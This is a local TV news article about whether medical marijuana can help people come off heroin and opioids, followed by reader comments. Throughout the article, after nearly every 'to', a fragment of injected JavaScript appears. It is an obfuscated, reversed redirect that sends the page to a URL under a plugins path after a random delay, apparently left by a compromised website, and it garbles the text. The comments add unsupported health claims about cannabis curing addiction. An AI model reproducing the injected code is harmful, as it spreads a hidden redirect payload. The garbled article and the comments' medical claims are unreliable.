Can medical marijuana help addicts transition off heroin and opioids?

CINCINNATI (WKRC) – Those who support the use of medical marijuana say it could be used toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to help prevent overdoses from heroin or other pain pills, but medical professionals are saying the research simply doesn’t support marijuana as a transition drug. In fact, a local addiction specialist has serious concerns with this idea.

As we continue toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to lose lives toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to heroin in the Tri-State, a group supporting those who would set up businesses for medical marijuana, called Medicine Man Technologies, is supporting the idea that helping people transition off of heroin or opioid addiction might be just one more way toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to use marijuana.

Dr. Michael Fletcher runs a program in the Tri-State called ICAN, or Integrated Chemical Addiction Network. He says, right now, studies toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to support this idea would be needed before anyone could support this idea as one of the listings for medical use of marijuana.

Fletcher treats hundreds of patients each year who get off heroin and other opioids with , he says, safe, well-tested medications that go through a rigorous FDA approval, and this should happen with marijuana also.

“There’s no evidence that shows anytime, anywhere recently that shows marijuana as a therapeutic benefit toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toward treating opiate addiction in adults or adolescents,” said Fletcher. “It’s always been a C1 drug, meaning its classification has no medical use.

Those who support this idea, however, say there is evidence from a study a few years ago that showed in places where marijuana became legal, opioid deaths dropped.

“I’m a recovering alcoholic; I’m 17 years sober,” said Carrie Roberts of Medicine Man Technologies. “I also know that I can’t take prescription pain meds [or] anti-anxiety medication because. as an alcoholic addict. I know that I can’t do that.”

Medicine Man Technologies supports the use of marijuana toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to help people get off heroin and other prescription painkillers.

Roberts says in places where marijuana has become legal for medical use, they saw a 25 percent reduction in deaths related toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to prescription opioids.

But Fletcher says it’s also important toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to note that switching toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to marijuana, or any other drug, won’t cure an addiction–that needs an emotional, medical and spiritual intervention.

“I really feel like this is not a hopeless situation for individuals or our city or the nation; care is available. Therapy does work, and the power of prayer works as well,” he said.

Like the FDA went through the testing of meth before making it legal? I don't like BS served warm or cold. I prefer no lies at all. I have lost faith in my government's ability for good judgment and I've decided to follow God's law instead to sort out the evil intents of rich folks in lawmaking.

Mothers milk, is a "gateway" drug!

  4. Clean And Stoner says:

Marijuana is NOT a gateway drug.. There's no evidence to support that old claim.
Dr. Fletcher is a brainwashed sycophant, towing the recovery industry line. Their success record is SO dreadfully horrible, there is no reason to listen to these people.. They have an obvious agenda($$$), and they profit much more by failures than successes.
The truth is if more people took cannabis, without succumbing to all the fear and doubt the treatment industry shovels with the help of religiously dogmatic groups like AA, very few would ever need them.
Just say no to these people, and give cannabis a try.. It works, unless you have "come to believe" you're "powerless". I suggest you aren't. But they want you to believe you are powerless, so you'll need them.
YOU DON'T and they cant really help you anyway.

I'm an opiate addict and I will be the first to say here that there are some things marijuana just can't fix. Everyone sees it as a magical, miracle herb AND IT IS…but speaking from my experience, marijuana provided me little to no relief for opiate withdrawal. Had it been effective, I wouldn't still be addicted. If you haven't experienced opiate withdrawal, just imagine the worst flu you've ever had in your life and quadruple the misery. That's the kind of hell we face and there is damn near nothing that can relieve it except for another opioid substitute. I mean come on, if you have the flu, do you really think weed is gonna help anything? Think of the pain you experienced if you've ever had surgery…even the strongest dro isn't enough kill that kind of pain. I'm all for the recreational and medical use of cannabis, but you have to be realistic and keep in mind that weed isn't always the answer when it comes to certain specific ailments. Opiates have and always will be the #1 pain reliever. That is the entire purpose of papaver somniferum. Junkies can get weed at the drop of a hat if they wanted to and if it really was a cure for addiction there would be no more addicts. Sorry if that came off as rude. I swear I'm not trying to be a smart-ass or anything. Its just facts.

Weed can be a gate way drug? so is doctors giving you pain killers. sooner or later people on pain killers go to cocaine because its cheaper. I guess doctors are a gate way drug. I used to be hooked to pain meds. Weed helped me get off of it and that's why its illegal

  12. Madeline Winter says:

Blah,p blah blah. Stupid doctors need to wake up. Shame on you Doctor Fletcher.

  13. RAW DAWG says:

Just because it can be a gateway drug doesn’t mean addicts can’t take a step back to it to get through the storm.
